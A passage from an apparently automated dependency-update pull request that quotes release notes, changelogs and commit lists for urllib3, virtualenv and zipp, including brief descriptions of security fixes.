\u003ccode\u003eRetry.remove_headers_on_redirect\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/urllib3/urllib3/compare/1.26.18...1.26.19\"\u003ehttps://github.com/urllib3/urllib3/compare/1.26.18...1.26.19\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eNote that due to an issue with our release automation, no \u003ccode\u003e multiple.intoto.jsonl\u003c/code\u003e file is available for this release.\u003c/p\u003e\n\u003ch2\u003e1.26.18\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMade body stripped from HTTP requests changing the request method to GET after HTTP 303 \u0026quot;See Other\u0026quot; redirect responses. (GHSA-g4mx-q9vg-27p4)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e1.26.17\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded the \u003ccode\u003eCookie\u003c/code\u003e header to the list of headers to strip from requests when redirecting to a different host. As before, different headers can be set via \u003ccode\u003eRetry.remove_headers_on_redirect\u003c/code\u003e. (GHSA-v845-jxx5-vc9f)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e1.26.16\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed thread-safety issue where accessing a \u003ccode\u003ePoolManager\u003c/code\u003e with many distinct origins would cause connection pools to be closed while requests are in progress (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/2954\"\u003e#2954\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e1.26.15\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix socket timeout value when HTTPConnection is reused (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/2645\"\u003eurllib3/urllib3#2645\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRemove \u0026quot;!\u0026quot; character from the unreserved characters in IPv6 Zone ID parsing (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/2899\"\u003eurllib3/urllib3#2899\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix IDNA handling of 'x80' byte (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/2901\"\u003eurllib3/urllib3#2901\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e1.26.14\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed parsing of port 0 (zero) returning None, instead of 0 (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/2850\"\u003e#2850\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRemoved deprecated \u003ccode\u003eHTTPResponse.getheaders()\u003c/code\u003e calls in \u003ccode\u003eurllib3.contrib\u003c/code\u003e module.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e1.26.13\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeprecated the \u003ccode\u003eHTTPResponse.getheaders()\u003c/code\u003e and \u003ccode\u003eHTTPResponse.getheader()\u003c/code\u003e methods.\u003c/li\u003e\n\u003cli\u003eFixed an issue where parsing a URL with leading zeroes in the port would be rejected even when the port number after removing the zeroes was valid.\u003c/li\u003e\n\u003cli\u003eFixed a deprecation warning when using cryptography v39.0.0.\u003c/li\u003e\n\u003cli\u003eRemoved the \u003ccode\u003e\u0026lt;4\u003c/code\u003e in the \u003ccode\u003eRequires-Python\u003c/code\u003e packaging metadata field.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e1.26.12\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeprecated the \u003ccode\u003eurllib3[secure]\u003c/code\u003e extra and the \u003ccode\u003eurllib3.contrib.pyopenssl\u003c/code\u003e module. Both will be removed in v2.x. See this \u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/2680\"\u003eGitHub issue\u003c/a\u003e for justification and info on how to migrate.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e1.26.11\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eIf you or your organization rely on urllib3 consider supporting us via \u003ca href=\"https://github.com/sponsors/urllib3\"\u003eGitHub Sponsors\u003c/a\u003e.\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003e:warning: \u003cstrong\u003eurllib3 v2.0 will drop support for Python 2\u003c/strong\u003e: \u003ca href=\"https://urllib3.readthedocs.io/en/latest/v2-roadmap.html\"\u003eRead more in the v2.0 Roadmap\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed an issue where reading more than 2 GiB in a call to HTTPResponse.read would raise an OverflowError on Python 3.9 and earlier.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/urllib3/urllib3/blob/main/CHANGES.rst\"\u003eurllib3's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e1.26.19 (2024-06-17)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eAdded the \u003ccode\u003eProxy-Authorization\u003c/code\u003e header to the list of headers to strip from requests when redirecting to a different host. As before, different headers can be set via \u003ccode\u003eRetry.remove_headers_on_redirect\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eFixed handling of OpenSSL 3.2.0 new error message for misconfiguring an HTTP proxy as HTTPS. (\u003ccode\u003e[#3405](https://github.com/urllib3/urllib3/issues/3405) \u0026lt;https://github.com/urllib3/urllib3/issues/3405\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.26.18 (2023-10-17)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eMade body stripped from HTTP requests changing the request method to GET after HTTP 303 \u0026quot;See Other\u0026quot; redirect responses.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.26.17 (2023-10-02)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eAdded the \u003ccode\u003eCookie\u003c/code\u003e header to the list of headers to strip from requests when redirecting to a different host. As before, different headers can be set via \u003ccode\u003eRetry.remove_headers_on_redirect\u003c/code\u003e. (\u003ccode\u003e[#3139](https://github.com/urllib3/urllib3/issues/3139) \u0026lt;https://github.com/urllib3/urllib3/pull/3139\u0026gt;\u003c/code\u003e_)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.26.16 (2023-05-23)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFixed thread-safety issue where accessing a \u003ccode\u003ePoolManager\u003c/code\u003e with many distinct origins\nwould cause connection pools to be closed while requests are in progress (\u003ccode\u003e[#2954](https://github.com/urllib3/urllib3/issues/2954) \u0026lt;https://github.com/urllib3/urllib3/pull/2954\u0026gt;\u003c/code\u003e_)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.26.15 (2023-03-10)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFix socket timeout value when \u003ccode\u003eHTTPConnection\u003c/code\u003e is reused (\u003ccode\u003e[#2645](https://github.com/urllib3/urllib3/issues/2645) \u0026lt;https://github.com/urllib3/urllib3/issues/2645\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eRemove \u0026quot;!\u0026quot; character from the unreserved characters in IPv6 Zone ID parsing\n(\u003ccode\u003e[#2899](https://github.com/urllib3/urllib3/issues/2899) \u0026lt;https://github.com/urllib3/urllib3/issues/2899\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eFix IDNA handling of '\\x80' byte (\u003ccode\u003e[#2901](https://github.com/urllib3/urllib3/issues/2901) \u0026lt;https://github.com/urllib3/urllib3/issues/2901\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.26.14 (2023-01-11)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFixed parsing of port 0 (zero) returning None, instead of 0. (\u003ccode\u003e[#2850](https://github.com/urllib3/urllib3/issues/2850) \u0026lt;https://github.com/urllib3/urllib3/issues/2850\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eRemoved deprecated getheaders() calls in contrib module. Fixed the type hint of \u003ccode\u003ePoolKey.key_retries\u003c/code\u003e by adding \u003ccode\u003ebool\u003c/code\u003e to the union. (\u003ccode\u003e[#2865](https://github.com/urllib3/urllib3/issues/2865) \u0026lt;https://github.com/urllib3/urllib3/issues/2865\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.26.13 (2022-11-23)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eDeprecated the \u003ccode\u003eHTTPResponse.getheaders()\u003c/code\u003e and \u003ccode\u003eHTTPResponse.getheader()\u003c/code\u003e methods.\u003c/li\u003e\n\u003cli\u003eFixed an issue where parsing a URL with leading zeroes in the port would be rejected\neven when the port number after removing the zeroes was valid.\u003c/li\u003e\n\u003cli\u003eFixed a deprecation warning when using cryptography v39.0.0.\u003c/li\u003e\n\u003cli\u003eRemoved the \u003ccode\u003e\u0026lt;4\u003c/code\u003e in the \u003ccode\u003eRequires-Python\u003c/code\u003e packaging metadata field.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.26.12 (2022-08-22)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eDeprecated the \u003ccode\u003eurllib3[secure]\u003c/code\u003e extra and the \u003ccode\u003eurllib3.contrib.pyopenssl\u003c/code\u003e module.\nBoth will be removed in v2.x. See this \u003ccode\u003eGitHub issue \u0026lt;https://github.com/urllib3/urllib3/issues/2680\u0026gt;\u003c/code\u003e_\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/d9d85c88aa644af56d5e129634e750ce76e1a765\"\u003e\u003ccode\u003ed9d85c8\u003c/code\u003e\u003c/a\u003e Release 1.26.19\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/8528b63b6fe5cfd7b21942cf988670de68fcd8c0\"\u003e\u003ccode\u003e8528b63\u003c/code\u003e\u003c/a\u003e [1.26] Fix downstream tests (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3409\"\u003e#3409\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/40b6d1605814dd1db0a46e202d6e56f2e4c9a468\"\u003e\u003ccode\u003e40b6d16\u003c/code\u003e\u003c/a\u003e Merge pull request from GHSA-34jh-p97f-mpxf\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/29cfd02f66376c61bd20f1725477925106321f68\"\u003e\u003ccode\u003e29cfd02\u003c/code\u003e\u003c/a\u003e Fix handling of OpenSSL 3.2.0 new error message \u0026quot;record layer failure\u0026quot; (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3405\"\u003e#3405\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/b60064388302f54a3455259ddab121618650a154\"\u003e\u003ccode\u003eb600643\u003c/code\u003e\u003c/a\u003e [1.26] Bump RECENT_DATE (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3404\"\u003e#3404\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/7e2d3890926d4788e219f63e2e36fbeb8714827f\"\u003e\u003ccode\u003e7e2d389\u003c/code\u003e\u003c/a\u003e [1.26] Fix running CPython 2.7 tests in CI (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3137\"\u003e#3137\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/9c2c2307dd1d6af504e09aac0326d86ee3597a0b\"\u003e\u003ccode\u003e9c2c230\u003c/code\u003e\u003c/a\u003e Release 1.26.18 (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3159\"\u003e#3159\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/b594c5ceaca38e1ac215f916538fb128e3526a36\"\u003e\u003ccode\u003eb594c5c\u003c/code\u003e\u003c/a\u003e Merge pull request from GHSA-g4mx-q9vg-27p4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/944f0eb134485f41bc531be52de12ba5a37bca73\"\u003e\u003ccode\u003e944f0eb\u003c/code\u003e\u003c/a\u003e [1.26] Use vendored six in urllib3.contrib.securetransport\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/c9016bf464751a02b7e46f8b86504f47d4238784\"\u003e\u003ccode\u003ec9016bf\u003c/code\u003e\u003c/a\u003e Release 1.26.17\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/urllib3/urllib3/compare/1.26.4...1.26.19\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `virtualenv` from 20.2.1 to 20.26.6\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pypa/virtualenv/releases\"\u003evirtualenv's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e20.26.6\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003erelease 20.26.5 by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2766\"\u003epypa/virtualenv#2766\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2768\"\u003e#2768\u003c/a\u003e: Quote template strings in activation scripts by \u003ca href=\"https://github.com/y5c4l3\"\u003e\u003ccode\u003e@​y5c4l3\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2771\"\u003epypa/virtualenv#2771\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/y5c4l3\"\u003e\u003ccode\u003e@​y5c4l3\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2771\"\u003epypa/virtualenv#2771\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/pypa/virtualenv/compare/20.26.5...20.26.6\"\u003ehttps://github.com/pypa/virtualenv/compare/20.26.5...20.26.6\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e20.26.5\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003erelease 20.26.4 by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2761\"\u003epypa/virtualenv#2761\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUse uv over pip by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2765\"\u003epypa/virtualenv#2765\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/pypa/virtualenv/compare/20.26.4...20.26.5\"\u003ehttps://github.com/pypa/virtualenv/compare/20.26.4...20.26.5\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e20.26.4\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003erelease 20.26.3 by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2742\"\u003epypa/virtualenv#2742\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix whitespace around backticks in changelog by \u003ca href=\"https://github.com/edmorley\"\u003e\u003ccode\u003e@​edmorley\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2751\"\u003epypa/virtualenv#2751\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eTest latest Python 3.13 by \u003ca href=\"https://github.com/hugovk\"\u003e\u003ccode\u003e@​hugovk\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2752\"\u003epypa/virtualenv#2752\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix typo in Nushell activation script by \u003ca href=\"https://github.com/edmorley\"\u003e\u003ccode\u003e@​edmorley\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2754\"\u003epypa/virtualenv#2754\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eGitHub Actions: Replace deprecated macos-12 with macos-13 by \u003ca href=\"https://github.com/hugovk\"\u003e\u003ccode\u003e@​hugovk\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2756\"\u003epypa/virtualenv#2756\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2728\"\u003e#2728\u003c/a\u003e: Activating venv create unwanted console output  by \u003ca href=\"https://github.com/ShootGan\"\u003e\u003ccode\u003e@​ShootGan\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2748\"\u003epypa/virtualenv#2748\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpgrade bundled wheels by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2760\"\u003epypa/virtualenv#2760\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ShootGan\"\u003e\u003ccode\u003e@​ShootGan\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2748\"\u003epypa/virtualenv#2748\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/pypa/virtualenv/compare/20.26.3...20.26.4\"\u003ehttps://github.com/pypa/virtualenv/compare/20.26.3...20.26.4\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e20.26.3\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003erelease 20.26.2 by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2724\"\u003epypa/virtualenv#2724\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump embeded wheels by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2741\"\u003epypa/virtualenv#2741\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/pypa/virtualenv/compare/20.26.2...20.26.3\"\u003ehttps://github.com/pypa/virtualenv/compare/20.26.2...20.26.3\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e20.26.2\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pypa/virtualenv/blob/main/docs/changelog.rst\"\u003evirtualenv's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev20.26.6 (2024-09-27)\u003c/h2\u003e\n\u003cp\u003eBugfixes - 20.26.6\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e- Properly quote string placeholders in activation script templates to mitigate\n  potential command injection - by :user:`y5c4l3`. (:issue:`2768`)\n\u003ch2\u003ev20.26.5 (2024-09-17)\u003c/h2\u003e\n\u003cp\u003eBugfixes - 20.26.5\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade embedded wheels: setuptools to \u003ccode\u003e75.1.0\u003c/code\u003e from \u003ccode\u003e74.1.2\u003c/code\u003e - by :user:\u003ccode\u003egaborbernat\u003c/code\u003e. (:issue:\u003ccode\u003e2765\u003c/code\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev20.26.4 (2024-09-07)\u003c/h2\u003e\n\u003cp\u003eBugfixes - 20.26.4\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e- no longer create `()` output in console during activation of a virtualenv by .bat file. (:issue:`2728`)\n- Upgrade embedded wheels:\n\u003cul\u003e\n\u003cli\u003ewheel to \u003ccode\u003e0.44.0\u003c/code\u003e from \u003ccode\u003e0.43.0\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003epip to \u003ccode\u003e24.2\u003c/code\u003e from \u003ccode\u003e24.1\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003esetuptools to \u003ccode\u003e74.1.2\u003c/code\u003e from \u003ccode\u003e70.1.0\u003c/code\u003e (:issue:\u003ccode\u003e2760\u003c/code\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev20.26.3 (2024-06-21)\u003c/h2\u003e\n\u003cp\u003eBugfixes - 20.26.3\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eUpgrade embedded wheels:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003esetuptools to \u003ccode\u003e70.1.0\u003c/code\u003e from \u003ccode\u003e69.5.1\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003epip to \u003ccode\u003e24.1\u003c/code\u003e from \u003ccode\u003e24.0\u003c/code\u003e (:issue:\u003ccode\u003e2741\u003c/code\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev20.26.2 (2024-05-13)\u003c/h2\u003e\n\u003cp\u003eBugfixes - 20.26.2\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e- ``virtualenv.pyz`` no longer fails when zipapp path contains a symlink - by :user:`HandSonic` and :user:`petamas`. (:issue:`1949`)\n- Fix bad return code from activate.sh if hashing is disabled - by :user:'fenkes-ibm'. (:issue:`2717`)\n\u003ch2\u003ev20.26.1 (2024-04-29)\u003c/h2\u003e\n\u003cp\u003eBugfixes - 20.26.1\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/ec04726d065372ffad9920998aef1ce41252a61d\"\u003e\u003ccode\u003eec04726\u003c/code\u003e\u003c/a\u003e release 20.26.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/86dddeda7c991f8529e1995bbff280fb7b761972\"\u003e\u003ccode\u003e86ddded\u003c/code\u003e\u003c/a\u003e Fix \u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2768\"\u003e#2768\u003c/a\u003e: Quote template strings in activation scripts (\u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2771\"\u003e#2771\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/6bb3f6226c18d69bb6cfa3475b6d46dd463bb530\"\u003e\u003ccode\u003e6bb3f62\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2769\"\u003e#2769\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/220d49c2e3ade2ed24f5712ab5a23895cde2e04c\"\u003e\u003ccode\u003e220d49c\u003c/code\u003e\u003c/a\u003e Bump pypa/gh-action-pypi-publish from 1.10.1 to 1.10.2 (\u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2767\"\u003e#2767\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/cf340c83c2828a92def78c77b3e037a2baa4d557\"\u003e\u003ccode\u003ecf340c8\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2766\"\u003e#2766\u003c/a\u003e from pypa/release-20.26.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/f3172b4da576b88275a14d2e7bbeb98b8f958a05\"\u003e\u003ccode\u003ef3172b4\u003c/code\u003e\u003c/a\u003e release 20.26.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/22b9795eb6bed0c17d0415c5513eca099a0a11ad\"\u003e\u003ccode\u003e22b9795\u003c/code\u003e\u003c/a\u003e Use uv over pip (\u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2765\"\u003e#2765\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/35d8269aba12a1e3c60183a2082b2c4d0cc1192f\"\u003e\u003ccode\u003e35d8269\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2764\"\u003e#2764\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/ee77feb77ccb3c5deefa318630c59315bcfda521\"\u003e\u003ccode\u003eee77feb\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2763\"\u003e#2763\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/c5160566293ed098ca30e0856dbf44588dd5c3a3\"\u003e\u003ccode\u003ec516056\u003c/code\u003e\u003c/a\u003e Update README.md\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pypa/virtualenv/compare/20.2.1...20.26.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `zipp` from 3.4.0 to 3.19.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jaraco/zipp/blob/main/NEWS.rst\"\u003ezipp's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003ev3.19.1\u003c/h1\u003e\n\u003ch2\u003eBugfixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImproved handling of malformed zip files. (\u003ca href=\"https://redirect.github.com/jaraco/zipp/issues/119\"\u003e#119\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003ev3.19.0\u003c/h1\u003e\n\u003ch2\u003eFeatures\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImplement is_symlink. (\u003ca href=\"https://redirect.github.com/jaraco/zipp/issues/117\"\u003e#117\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003ev3.18.2\u003c/h1\u003e\n\u003cp\u003eNo significant 